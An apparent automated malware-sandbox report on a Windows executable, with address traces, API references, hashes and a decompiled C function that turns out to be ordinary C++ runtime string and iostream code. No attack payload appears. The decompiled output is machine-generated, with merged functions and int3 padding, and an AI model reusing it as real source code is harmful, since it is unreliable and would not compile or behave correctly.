0x0040d07d
0x0040d080
0x0040d086
0x0040d089
0x0040d091
0x0040d091
0x0040cecc
0x0040cecc
0x0040cecf
0x0040ced1
0x00000000
0x0040ced3
0x0040ced3
0x0040ced5
0x0040ced8
0x00000000
0x0040ceda
0x0040ceda
0x0040cedd
0x00000000
0x0040cedf
0x0040cedf
0x00000000
0x0040cedf
0x0040cedd
0x0040ced8
0x0040ced1
0x0040ceca
0x0040cec5
0x00000000
0x0040ceea
0x0040ceea
0x0040cef1
0x0040cef5
0x0040cefc
0x0040cefe
0x0040cefe
0x0040cf01
0x0040cf04
0x0040cf09
0x0040cf0c
0x0040cf0e
0x0040cf0e
0x00000000
0x0040cf14
0x0040cdfd
0x0040cdfd
0x0040ce00
0x0040ce1b
0x0040ce1d
0x00000000
0x0040ce1f
0x0040ce1f
0x0040ce23
0x0040ce26
0x0040ce35
0x0040ce3a
0x0040ce3d
0x0040ce28
0x0040ce2b
0x0040ce32
0x0040ce32
0x0040ce26
0x0040ce02
0x0040ce08
0x0040ce0d
0x0040ce0f
0x0040ce6e
0x0040ce73
0x0040ce11
0x0040ce11
0x0040ce11
0x0040ce15
0x0040ce40
0x0040ce17
0x0040ce17
0x0040ce17
0x0040ce42
0x0040ce44
0x0040ce49
0x0040ce4e
0x0040ce51
0x0040ce55
0x0040ce58
0x0040ce6a
0x00000000
0x0040ce5a
0x0040ce5c
0x0040ce65
0x0040ce65
0x0040ce58
0x0040ce0f
0x0040ce00
0x0040cd9c
0x0040cd9c
0x0040cd9f
0x0040cda2
0x0040cda8
0x0040cda4
0x0040cda4
0x0040cda4
0x0040cdaa
0x0040cdac
0x00000000
0x0040cdae
0x0040cdae
0x0040cdb1
0x0040cdb7
0x0040cdb3
0x0040cdb3
0x0040cdb3
0x0040cdbe
0x0040cdc0
0x00000000
0x0040cdc2
0x0040cdc2
0x0040cdc5
0x0040cddd
0x0040cde1
0x0040cde5
0x0040cde5
0x0040cde7
0x0040cde8
0x0040cde9
0x0040cdf0
0x0040cdc7
0x0040cdc7
0x0040cdcb
0x0040cdcf
0x0040cdcf
0x0040cdd1
0x0040cdd2
0x0040cdd3
0x0040cdda
0x0040cdda
0x0040cdc5
0x0040cdc0
0x0040cdac
0x0040ccda
0x0040ccda
0x0040ccdd
0x0040cd01
0x0040cd03
0x00000000
0x0040cd05
0x0040cd05
0x0040cd09
0x0040cd0c
0x0040cd1a
0x0040cd1e
0x0040cd21
0x0040cd0e
0x0040cd11
0x0040cd17
0x0040cd17
0x0040cd0c
0x0040ccdf
0x0040cce3
0x0040cce8
0x0040ccea
0x0040cd66
0x0040cd6a
0x0040ccec
0x0040ccec
0x0040ccec
0x0040ccef
0x0040cd2e
0x0040cd32
0x0040cd38
0x0040cd34
0x0040cd34
0x0040cd34
0x0040cd42
0x0040ccf1
0x0040ccf1
0x0040ccf5
0x0040cd2a
0x0040ccf7
0x0040ccfd
0x0040ccfd
0x0040ccf5
0x0040cd4a
0x0040cd4e
0x0040cd51
0x0040cd62
0x00000000
0x0040cd53
0x0040cd55
0x0040cd5d
0x0040cd5d
0x0040cd51
0x0040ccea
0x0040ccdd
0x0040ccd4
0x0040cbe4
0x0040cbe4
0x0040cbe7
0x0040cbeb
0x0040cbed
0x0040cbed
0x0040cbf0
0x0040cbf8
0x0040cc03
0x0040cc03
0x0040cbde
0x0040cbd6
0x0040cb0c
0x0040cb0c
0x0040cb0f
0x0040cb28
0x0040cb2a
0x00000000
0x0040cb2c
0x0040cb2c
0x0040cb2f
0x0040cb33
0x0040cb44
0x0040cb49
0x0040cb4c
0x0040cb35
0x0040cb39
0x0040cb40
0x0040cb40
0x0040cb33
0x0040cb11
0x0040cb15
0x0040cb1a
0x0040cb1c
0x00000000
0x0040cb1e
0x0040cb1e
0x0040cb1e
0x0040cb22
0x0040cb4f
0x0040cb24
0x0040cb24
0x0040cb24
0x0040cb51
0x0040cb53
0x0040cb59
0x0040cb5d
0x0040cb62
0x0040cb65
0x0040cb69
0x0040cb6c
0x0040cb7f
0x00000000
0x0040cb6e
0x0040cb70
0x0040cb7a
0x0040cb7a
0x0040cb6c
0x0040cb1c
0x0040cb0f
0x0040cb06
0x0040cafd
0x0040ca8c
0x0040ca8c
0x0040ca8f
0x0040ca92
0x0040ca98
0x0040ca94
0x0040ca94
0x0040ca94
0x0040ca9a
0x0040ca9c
0x00000000
0x0040ca9e
0x0040ca9e
0x0040caa1
0x0040caa7
0x0040caa3
0x0040caa3
0x0040caa3
0x0040caae
0x0040cab0
0x00000000
0x0040cab2
0x0040cab2
0x0040cab5
0x0040cacd
0x0040cad1
0x0040cad5
0x0040cad5
0x0040cad7
0x0040cad8
0x0040cad9
0x0040cae0
0x0040cab7
0x0040cab7
0x0040cabb
0x0040cabf
0x0040cabf
0x0040cac1
0x0040cac2
0x0040cac3
0x0040caca
0x0040caca
0x0040cab5
0x0040cab0
0x0040ca9c
0x0040ca00
0x0040ca00
0x0040ca03
0x0040ca38
0x0040ca3a
0x00000000
0x0040ca3c
0x0040ca3c
0x0040ca3f
0x0040ca43
0x0040ca52
0x0040ca57
0x0040ca5a
0x0040ca45
0x0040ca48
0x0040ca4f
0x0040ca4f
0x0040ca43
0x0040ca05
0x0040ca09
0x0040ca0e
0x0040ca10
0x00000000
0x0040ca12
0x0040ca12
0x0040ca1c
0x0040ca21
0x0040ca25
0x0040ca28
0x0040ca5f
0x00000000
0x0040ca2a
0x0040ca2c
0x0040ca35
0x0040ca35
0x0040ca28
0x0040ca10
0x0040ca03
0x0040c9fe
0x0040c9f9
0x0040c927
0x0040c927
0x0040c92a
0x0040c94f
0x0040c951
0x00000000
0x0040c953
0x0040c953
0x0040c956
0x0040c95a
0x0040c96b
0x0040c970
0x0040c973
0x0040c95c
0x0040c960
0x0040c967
0x0040c967
0x0040c95a
0x0040c92c
0x0040c930
0x0040c935
0x0040c939
0x0040c93b
0x00000000
0x0040c93d
0x0040c93d
0x0040c93d
0x0040c941
0x0040c943
0x0040c943
0x0040c945
0x0040c949
0x0040c976
0x0040c94b
0x0040c94b
0x0040c94b
0x0040c978
0x0040c97a
0x0040c984
0x0040c987
0x0040c98c
0x0040c98f
0x0040c993
0x0040c996
0x0040c9a9
0x00000000
0x0040c998
0x0040c99a
0x0040c9a4
0x0040c9a4
0x0040c996
0x0040c93b
0x0040c92a
0x0040c921
0x0040c918
0x0040c90c
0x0040c8a5
0x0040c8a5
0x0040c8a8
0x0040c8a8
0x0040c8ab
0x0040c8ae
0x0040c8ae
0x0040c8a3
0x0040c894
0x0040c88d
0x0040c878
0x0040c878
0x0040c878
0x0040c878
0x0040c832
0x0040c832
0x0040c835
0x0040c835
0x0040c838
0x0040c83b
0x0040c83b
0x0040c830
0x0040c821
0x0040c81a
0x0040c808
0x0040c808
0x0040c808
0x0040c808
0x0040c7c2
0x0040c7c2
0x0040c7c5
0x0040c7c5
0x0040c7c8
0x0040c7cb
0x0040c7cb
0x0040c7c0
0x0040c7b1
0x0040c7aa
0x0040c798
0x0040c798
0x0040c798
0x0040c798
0x00000000

APIs

new.LIBCMT ref: 0040C7B4
new.LIBCMT ref: 0040C7CF

Part of subcall function 0041500C: Concurrency::cancel_current_task.LIBCPMT ref: 0041502B

Concurrency::cancel_current_task.LIBCPMT ref: 0040C7DD

Part of subcall function 00415C7B: __CxxThrowException@8.LIBVCRUNTIME ref: 00415C92

Concurrency::cancel_current_task.LIBCPMT ref: 0040C7E2

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Concurrency::cancel_current_task$Exception@8Throw
String ID:
API String ID: 3339364867-0
Opcode ID: 1f986e24cc05b05f7a84dfa6ea0610c77ea09b7f560a5d586c74fee42df236dc
Instruction ID: ccd3557fe56c45473776e8f88d04009489bf7f6a4cd725c4c6e6f63bfbb183dc
Opcode Fuzzy Hash: 1f986e24cc05b05f7a84dfa6ea0610c77ea09b7f560a5d586c74fee42df236dc
Instruction Fuzzy Hash: 35F0A7B2541602C6D628B77184C25EFB2889E9439CB10473FF516D36D2F73CC89589AF

Uniqueness

Uniqueness Score: 2.84%

Function 0040C800, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040C800(void* __ebx, void* __edx, signed int __ebp, signed int _a4, signed int _a8, intOrPtr _a12) {
				signed int _v0;
				intOrPtr _v12;
				signed int _v16;
				signed int _v28;
				signed int _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr* _v52;
				char _v72;
				signed int _v76;
				signed int _v88;
				signed int _v92;
				char _v120;
				signed int _v124;
				char _v148;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v176;
				void* __edi;
				void* __esi;
				signed int _t159;
				signed int _t164;
				intOrPtr _t169;
				intOrPtr _t181;
				intOrPtr* _t188;
				signed int _t189;
				intOrPtr _t190;
				signed int _t195;
				void* _t197;
				void* _t201;
				void* _t205;
				signed int _t209;
				signed char _t220;
				signed int _t221;
				signed int _t227;
				signed int _t231;
				signed int _t234;
				signed int _t235;
				signed int _t244;
				void* _t248;
				signed int _t255;
				signed int _t259;
				signed int _t269;
				signed int _t273;
				signed int _t276;
				signed int _t277;
				signed int _t283;
				void* _t287;
				signed int _t298;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t310;
				void* _t311;
				intOrPtr* _t312;
				signed int _t313;
				signed int _t314;
				intOrPtr* _t315;
				signed int _t316;
				intOrPtr* _t317;
				signed int _t323;
				signed int _t325;
				signed int _t336;
				signed int _t338;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed char _t351;
				signed char _t353;
				char* _t356;
				signed char* _t359;
				intOrPtr _t362;
				intOrPtr _t363;
				signed int _t367;
				signed int _t370;
				signed int _t372;
				intOrPtr _t374;
				signed int _t379;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				intOrPtr* _t386;
				void* _t390;
				intOrPtr _t400;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed char* _t425;
				char* _t427;
				signed int _t458;
				signed int _t459;
				intOrPtr _t460;
				signed int _t461;
				intOrPtr _t472;
				void* _t477;

				_t458 = __ebp;
				_t381 = __edx;
				_t311 = __ebx;
				_t159 = _a4;
				if(_t159 != 0) {
					__eflags = _t159 - 0x3fffffff;
					if(__eflags > 0) {
						E00415C7B(__edx, __eflags);
						goto L10;
					} else {
						_t307 = _t159 << 2;
						__eflags = _t307 - 0x1000;
						if(__eflags < 0) {
							_t159 = E0041500C(__edx, __eflags, _t307);
							_t477 = _t477 + 4;
							__eflags = _t159;
							if(__eflags != 0) {
								goto L1;
							} else {
								goto L12;
							}
						} else {
							_t348 = _t307 + 0x23;
							__eflags = _t348 - _t307;
							if(__eflags <= 0) {
								L10:
								E00415C7B(_t381, __eflags);
								goto L11;
							} else {
								_t308 = E0041500C(__edx, __eflags, _t348); // executed
								_t348 = _t308;
								_t477 = _t477 + 4;
								__eflags = _t348;
								if(__eflags == 0) {
									L11:
									E0041A825(_t311, _t348, _t381, __eflags);
									L12:
									E0041A825(_t311, _t348, _t381, __eflags);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_t164 = _a4;
									__eflags = _t164;
									if(_t164 != 0) {
										__eflags = _t164 - 0x15555555;
										if(__eflags > 0) {
											E00415C7B(_t381, __eflags);
											goto L23;
										} else {
											_t303 = _t164 + _t164 * 2 << 2;
											__eflags = _t303 - 0x1000;
											if(__eflags < 0) {
												_t164 = E0041500C(_t381, __eflags, _t303);
												_t477 = _t477 + 4;
												__eflags = _t164;
												if(__eflags != 0) {
													goto L14;
												} else {
													goto L25;
												}
											} else {
												_t348 = _t303 + 0x23;
												__eflags = _t348 - _t303;
												if(__eflags <= 0) {
													L23:
													E00415C7B(_t381, __eflags);
													goto L24;
												} else {
													_t348 = E0041500C(_t381, __eflags, _t348);
													_t477 = _t477 + 4;
													__eflags = _t348;
													if(__eflags == 0) {
														L24:
														E0041A825(_t311, _t348, _t381, __eflags);
														L25:
														E0041A825(_t311, _t348, _t381, __eflags);
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														_t382 = _a8;
														_push(_t311);
														_t312 = _a4;
														_t419 = _t348;
														_t169 =  *((intOrPtr*)(_t312 + 0x10));
														__eflags = _t169 - _t382;
														if(__eflags < 0) {
															_push("invalid string position");
															E0041371B(_t312, _t383, __eflags);
															goto L48;
														} else {
															_t348 =  *(_t419 + 0x10);
															_t287 = _t169 - _t382;
															_push(_t458);
															_t472 = _a12;
															__eflags = _t472 - _t287;
															_t458 =  >  ? _t287 : _t472;
															__eflags =  !_t348 - _t458;
															if(__eflags <= 0) {
																L48:
																_push("string too long");
																E004136FB(_t312, _t383, __eflags);
																goto L49;
															} else {
																_push(_t383);
																_t383 = _t348 + _t458;
																__eflags = _t458;
																if(_t458 == 0) {
																	L46:
																	return _t419;
																} else {
																	__eflags = _t383 - 0xfffffffe;
																	if(__eflags > 0) {
																		L49:
																		_push("string too long");
																		E004136FB(_t312, _t383, __eflags);
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		_push(_t312);
																		_t313 = _v16;
																		_push(_t419);
																		_t420 = _t348;
																		_t349 =  *(_t420 + 0x10);
																		__eflags =  !_t349 - _t313;
																		if(__eflags <= 0) {
																			_push("string too long");
																			E004136FB(_t313, _t383, __eflags);
																			goto L64;
																		} else {
																			_push(_t383);
																			_t383 = _t349 + _t313;
																			__eflags = _t313;
																			if(_t313 == 0) {
																				L62:
																				return _t420;
																			} else {
																				__eflags = _t383 - 0xfffffffe;
																				if(__eflags > 0) {
																					L64:
																					_push("string too long");
																					E004136FB(_t313, _t383, __eflags);
																					asm("int3");
																					_push(_t313);
																					_t314 = _v32;
																					_push(_t420);
																					_t421 = _t349;
																					__eflags = _t314;
																					if(_t314 == 0) {
																						L77:
																						_t350 =  *(_t421 + 0x10);
																						_push(_t458);
																						_t459 = _v28;
																						__eflags =  !_t350 - _t459;
																						if(__eflags <= 0) {
																							_push("string too long");
																							E004136FB(_t314, _t383, __eflags);
																							goto L96;
																						} else {
																							_push(_t383);
																							_t383 = _t350 + _t459;
																							__eflags = _t459;
																							if(_t459 == 0) {
																								L94:
																								return _t421;
																							} else {
																								__eflags = _t383 - 0xfffffffe;
																								if(__eflags > 0) {
																									L96:
																									_push("string too long");
																									E004136FB(_t314, _t383, __eflags);
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									_push(_t314);
																									_t315 = _v52;
																									_push(_t459);
																									_t460 = _v48;
																									_push(_t421);
																									_t181 =  *((intOrPtr*)(_t315 + 0x10));
																									_t422 = _t350;
																									__eflags = _t181 - _t460;
																									if(__eflags < 0) {
																										_push("invalid string position");
																										E0041371B(_t315, _t383, __eflags);
																										goto L122;
																									} else {
																										_t248 = _t181 - _t460;
																										_push(_t383);
																										_t400 = _v44;
																										__eflags = _t400 - _t248;
																										_t383 =  >  ? _t248 : _t400;
																										__eflags = _t422 - _t315;
																										if(_t422 != _t315) {
																											__eflags = _t383 - 0xfffffffe;
																											if(__eflags > 0) {
																												goto L123;
																											} else {
																												__eflags =  *((intOrPtr*)(_t422 + 0x14)) - _t383;
																												if( *((intOrPtr*)(_t422 + 0x14)) >= _t383) {
																													__eflags = _t383;
																													if(_t383 != 0) {
																														goto L106;
																													} else {
																														__eflags =  *((intOrPtr*)(_t422 + 0x14)) - 0x10;
																														 *(_t422 + 0x10) = _t383;
																														if( *((intOrPtr*)(_t422 + 0x14)) < 0x10) {
																															_t255 = _t422;
																															 *_t255 = 0;
																															return _t255;
																														} else {
																															 *( *_t422) = 0;
																															return _t422;
																														}
																													}
																												} else {
																													E004077E0(_t350, _t383,  *(_t422 + 0x10));
																													__eflags = _t383;
																													if(_t383 == 0) {
																														L120:
																														return _t422;
																													} else {
																														L106:
																														__eflags =  *((intOrPtr*)(_t315 + 0x14)) - 0x10;
																														if( *((intOrPtr*)(_t315 + 0x14)) >= 0x10) {
																															_t315 =  *_t315;
																														}
																														__eflags =  *((intOrPtr*)(_t422 + 0x14)) - 0x10;
																														if( *((intOrPtr*)(_t422 + 0x14)) < 0x10) {
																															_t370 = _t422;
																														} else {
																															_t370 =  *_t422;
																														}
																														__eflags = _t383;
																														if(_t383 != 0) {
																															E004170E0(_t370, _t315 + _t460, _t383);
																														}
																														__eflags =  *((intOrPtr*)(_t422 + 0x14)) - 0x10;
																														 *(_t422 + 0x10) = _t383;
																														if( *((intOrPtr*)(_t422 + 0x14)) < 0x10) {
																															 *((char*)(_t422 + _t383)) = 0;
																															goto L120;
																														} else {
																															 *((char*)( *_t422 + _t383)) = 0;
																															return _t422;
																														}
																													}
																												}
																											}
																										} else {
																											_t259 = _t383 + _t460;
																											__eflags =  *(_t422 + 0x10) - _t259;
																											if(__eflags < 0) {
																												L122:
																												_push("invalid string position");
																												E0041371B(_t315, _t383, __eflags);
																												L123:
																												_push("string too long");
																												E004136FB(_t315, _t383, __eflags);
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												_push(_t422);
																												_push(_t383);
																												_t384 = _v76;
																												_t423 = _t350;
																												__eflags = _t384 - 0xffffffff;
																												if(__eflags == 0) {
																													_push("string too long");
																													E004136FB(_t315, _t384, __eflags);
																													goto L145;
																												} else {
																													__eflags = _t384 - 0xfffffffe;
																													if(__eflags > 0) {
																														L145:
																														_push("string too long");
																														E004136FB(_t315, _t384, __eflags);
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														_push(_t315);
																														_t316 = _v92;
																														_push(_t423);
																														_t424 = _t350;
																														__eflags = _t316;
																														if(_t316 == 0) {
																															L158:
																															_push(_t384);
																															_t385 = _v88;
																															__eflags = _t385 - 0xfffffffe;
																															if(__eflags > 0) {
																																_push("string too long");
																																E004136FB(_t316, _t385, __eflags);
																																asm("int3");
																																asm("int3");
																																asm("int3");
																																asm("int3");
																																asm("int3");
																																asm("int3");
																																asm("int3");
																																asm("int3");
																																asm("int3");
																																asm("int3");
																																asm("int3");
																																asm("int3");
																																asm("int3");
																																asm("int3");
																																asm("int3");
																																asm("int3");
																																_push(_t460);
																																_t461 = _t350;
																																_push(_t385);
																																_t188 = _v0;
																																_t386 =  *_t188;
																																 *_t188 = _t188;
																																_t189 = _v0;
																																 *((intOrPtr*)(_t189 + 4)) = _t189;
																																_a4 = 0;
																																__eflags = _t386 - _v0;
																																if(_t386 == _v0) {
																																	L189:
																																	return _t189;
																																} else {
																																	_push(_t316);
																																	_push(_t424);
																																	do {
																																		_t109 = _t386 + 0x1c; // 0xffffffff
																																		_t190 =  *_t109;
																																		_t110 = _t386 + 8; // 0x40ba76
																																		_t425 = _t110;
																																		_t317 =  *_t386;
																																		__eflags = _t190 - 0x10;
																																		if(_t190 < 0x10) {
																																			goto L185;
																																		} else {
																																			_t351 =  *_t425;
																																			__eflags = _t190 + 1 - 0x1000;
																																			if(_t190 + 1 < 0x1000) {
																																				L184:
																																				L0041503F(_t351);
																																				_t477 = _t477 + 4;
																																				goto L185;
																																			} else {
																																				__eflags = _t351 & 0x0000001f;
																																				if(__eflags != 0) {
																																					L190:
																																					E0041A825(_t317, _t351, _t382, __eflags);
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					_t195 = _v124 & 0x00000017;
																																					 *(_t351 + 0xc) = _t195;
																																					_t353 =  *(_t351 + 0x10) & _t195;
																																					__eflags = _t353;
																																					if(_t353 == 0) {
																																						return _t195;
																																					} else {
																																						__eflags = _v120;
																																						if(_v120 != 0) {
																																							E00416C8D(0, 0);
																																							goto L198;
																																						} else {
																																							__eflags = _t353 & 0x00000004;
																																							if((_t353 & 0x00000004) != 0) {
																																								L198:
																																								_t197 = E00402600(_t425);
																																								_push("ios_base::badbit set");
																																								_push(_t197);
																																								E00404A40(_t317,  &_v148, _t386, _t461, 1);
																																								_v160 = 0x4377b4;
																																								E00416C8D( &_v160, 0x447bb0);
																																								goto L199;
																																							} else {
																																								__eflags = _t353 & 0x00000002;
																																								if((_t353 & 0x00000002) != 0) {
																																									L199:
																																									_t201 = E00402600(_t425);
																																									_push("ios_base::failbit set");
																																									_push(_t201);
																																									E00404A40(_t317,  &_v156, _t386, _t461, 1);
																																									_v168 = 0x4377b4;
																																									E00416C8D( &_v168, 0x447bb0);
																																								} else {
																																								}
																																							}
																																						}
																																						_t205 = E00402600(_t425);
																																						_push("ios_base::eofbit set");
																																						_push(_t205);
																																						_t356 =  &_v164;
																																						E00404A40(_t317, _t356, _t386, _t461, 1);
																																						_v176 = 0x4377b4;
																																						E00416C8D( &_v176, 0x447bb0);
																																						asm("int3");
																																						asm("int3");
																																						asm("int3");
																																						_push(_t425);
																																						_t427 = _t356;
																																						_push(_t386);
																																						__eflags =  *(_t427 + 0x4c);
																																						if( *(_t427 + 0x4c) != 0) {
																																							_t209 = E00409250(_t356, _t386, _t427, _t461);
																																							_push( *(_t427 + 0x4c));
																																							__eflags = _t209;
																																							_t389 =  ==  ? 0 : _t427;
																																							__eflags = E0041B702(0, _t209);
																																							_t390 =  !=  ? 0 :  ==  ? 0 : _t427;
																																						} else {
																																							_t390 = 0;
																																						}
																																						 *((char*)(_t427 + 0x48)) = 0;
																																						 *(_t427 + 0xc) = _t427 + 4;
																																						_t359 = _t427 + 8;
																																						 *(_t427 + 0x10) = _t359;
																																						 *(_t427 + 0x1c) = _t427 + 0x14;
																																						 *(_t427 + 0x20) = _t427 + 0x18;
																																						 *(_t427 + 0x2c) = _t427 + 0x24;
																																						 *(_t427 + 0x30) = _t427 + 0x28;
																																						 *((char*)(_t427 + 0x3d)) = 0;
																																						 *_t359 = 0;
																																						 *( *(_t427 + 0x20)) = 0;
																																						 *( *(_t427 + 0x30)) = 0;
																																						 *( *(_t427 + 0xc)) = 0;
																																						 *( *(_t427 + 0x1c)) = 0;
																																						 *( *(_t427 + 0x2c)) = 0;
																																						 *(_t427 + 0x4c) = 0;
																																						_t362 =  *0x44c7ec; // 0x0
																																						 *((intOrPtr*)(_t427 + 0x40)) = _t362;
																																						_t363 =  *0x44c7f0; // 0x0
																																						 *((intOrPtr*)(_t427 + 0x44)) = _t363;
																																						 *(_t427 + 0x38) = 0;
																																						return _t390;
																																					}
																																				} else {
																																					_t220 =  *(_t351 - 4);
																																					__eflags = _t220 - _t351;
																																					if(__eflags >= 0) {
																																						goto L190;
																																					} else {
																																						_t351 = _t351 - _t220;
																																						__eflags = _t351 - 4;
																																						if(__eflags < 0) {
																																							goto L190;
																																						} else {
																																							__eflags = _t351 - 0x23;
																																							if(__eflags > 0) {
																																								goto L190;
																																							} else {
																																								_t351 = _t220;
																																								goto L184;
																																							}
																																						}
																																					}
																																				}
																																			}
																																		}
																																		goto L205;
																																		L185:
																																		_t425[0x14] = 0xf;
																																		__eflags = _t425[0x14] - 0x10;
																																		_t425[0x10] = 0;
																																		if(_t425[0x14] >= 0x10) {
																																			_t425 =  *_t425;
																																		}
																																		 *_t425 = 0;
																																		_t189 = L0041503F(_t386);
																																		_t477 = _t477 + 4;
																																		_t386 = _t317;
																																		__eflags = _t317 - _v0;
																																	} while (_t317 != _v0);
																																	goto L189;
																																}
																															} else {
																																__eflags =  *(_t424 + 0x14) - _t385;
																																if( *(_t424 + 0x14) >= _t385) {
																																	__eflags = _t385;
																																	if(_t385 != 0) {
																																		goto L161;
																																	} else {
																																		__eflags =  *(_t424 + 0x14) - 0x10;
																																		 *(_t424 + 0x10) = _t385;
																																		if( *(_t424 + 0x14) < 0x10) {
																																			_t227 = _t424;
																																			 *_t227 = 0;
																																			return _t227;
																																		} else {
																																			 *( *_t424) = 0;
																																			return _t424;
																																		}
																																	}
																																} else {
																																	E004077E0(_t424, _t385,  *(_t424 + 0x10));
																																	__eflags = _t385;
																																	if(_t385 == 0) {
																																		L173:
																																		return _t424;
																																	} else {
																																		L161:
																																		__eflags =  *(_t424 + 0x14) - 0x10;
																																		if( *(_t424 + 0x14) < 0x10) {
																																			_t221 = _t424;
																																		} else {
																																			_t221 =  *_t424;
																																		}
																																		__eflags = _t385;
																																		if(_t385 != 0) {
																																			E004170E0(_t221, _t316, _t385);
																																		}
																																		__eflags =  *(_t424 + 0x14) - 0x10;
																																		 *(_t424 + 0x10) = _t385;
																																		if( *(_t424 + 0x14) < 0x10) {
																																			 *((char*)(_t424 + _t385)) = 0;
																																			goto L173;
																																		} else {
																																			 *((char*)( *_t424 + _t385)) = 0;
																																			return _t424;
																																		}
																																	}
																																}
																															}
																														} else {
																															_t350 =  *(_t424 + 0x14);
																															__eflags = _t350 - 0x10;
																															if(_t350 < 0x10) {
																																_t231 = _t424;
																															} else {
																																_t231 =  *_t424;
																															}
																															__eflags = _t316 - _t231;
																															if(_t316 < _t231) {
																																goto L158;
																															} else {
																																__eflags = _t350 - 0x10;
																																if(_t350 < 0x10) {
																																	_t382 = _t424;
																																} else {
																																	_t382 =  *_t424;
																																}
																																__eflags =  *(_t424 + 0x10) + _t382 - _t316;
																																if( *(_t424 + 0x10) + _t382 <= _t316) {
																																	goto L158;
																																} else {
																																	__eflags = _t350 - 0x10;
																																	if(_t350 < 0x10) {
																																		_push(_v88);
																																		_t234 = _t424;
																																		_t323 = _t316 - _t234;
																																		__eflags = _t323;
																																		_push(_t323);
																																		_push(_t424);
																																		L97();
																																		return _t234;
																																	} else {
																																		_push(_v88);
																																		_t235 =  *_t424;
																																		_t325 = _t316 - _t235;
																																		__eflags = _t325;
																																		_push(_t325);
																																		_push(_t424);
																																		L97();
																																		return _t235;
																																	}
																																}
																															}
																														}
																													} else {
																														__eflags =  *((intOrPtr*)(_t423 + 0x14)) - _t384;
																														if( *((intOrPtr*)(_t423 + 0x14)) >= _t384) {
																															__eflags = _t384;
																															if(_t384 != 0) {
																																goto L128;
																															} else {
																																__eflags =  *((intOrPtr*)(_t423 + 0x14)) - 0x10;
																																 *(_t423 + 0x10) = _t384;
																																if( *((intOrPtr*)(_t423 + 0x14)) < 0x10) {
																																	_t244 = _t423;
																																	 *_t244 = 0;
																																	return _t244;
																																} else {
																																	 *( *_t423) = 0;
																																	return _t423;
																																}
																															}
																														} else {
																															E004077E0(_t350, _t384,  *(_t423 + 0x10));
																															__eflags = _t384;
																															if(_t384 == 0) {
																																L143:
																																return _t423;
																															} else {
																																L128:
																																__eflags = _t384 - 1;
																																if(_t384 != 1) {
																																	__eflags =  *((intOrPtr*)(_t423 + 0x14)) - 0x10;
																																	if( *((intOrPtr*)(_t423 + 0x14)) < 0x10) {
																																		_t367 = _t423;
																																	} else {
																																		_t367 =  *_t423;
																																	}
																																	E00417660(_t384, _t367, _v72, _t384);
																																} else {
																																	__eflags =  *((intOrPtr*)(_t423 + 0x14)) - 0x10;
																																	if( *((intOrPtr*)(_t423 + 0x14)) < 0x10) {
																																		 *_t423 = _v72;
																																	} else {
																																		 *( *_t423) = _v72;
																																	}
																																}
																																__eflags =  *((intOrPtr*)(_t423 + 0x14)) - 0x10;
																																 *(_t423 + 0x10) = _t384;
																																if( *((intOrPtr*)(_t423 + 0x14)) < 0x10) {
																																	 *((char*)(_t423 + _t384)) = 0;
																																	goto L143;
																																} else {
																																	 *((char*)( *_t423 + _t384)) = 0;
																																	return _t423;
																																}
																															}
																														}
																													}
																												}
																											} else {
																												 *(_t422 + 0x10) = _t259;
																												__eflags =  *((intOrPtr*)(_t422 + 0x14)) - 0x10;
																												if( *((intOrPtr*)(_t422 + 0x14)) >= 0x10) {
																													_t350 =  *_t422;
																												}
																												 *((char*)(_t350 + _t259)) = 0;
																												E0040DFD0(_t315, _t422, _t460, 0, _t460);
																												return _t422;
																											}
																										}
																									}
																								} else {
																									__eflags =  *((intOrPtr*)(_t421 + 0x14)) - _t383;
																									if( *((intOrPtr*)(_t421 + 0x14)) >= _t383) {
																										__eflags = _t383;
																										if(_t383 != 0) {
																											goto L82;
																										} else {
																											 *(_t421 + 0x10) = _t383;
																											__eflags =  *((intOrPtr*)(_t421 + 0x14)) - 0x10;
																											if( *((intOrPtr*)(_t421 + 0x14)) < 0x10) {
																												_t269 = _t421;
																												 *_t269 = 0;
																												return _t269;
																											} else {
																												 *( *_t421) = 0;
																												return _t421;
																											}
																										}
																									} else {
																										E004077E0(_t421, _t383, _t350);
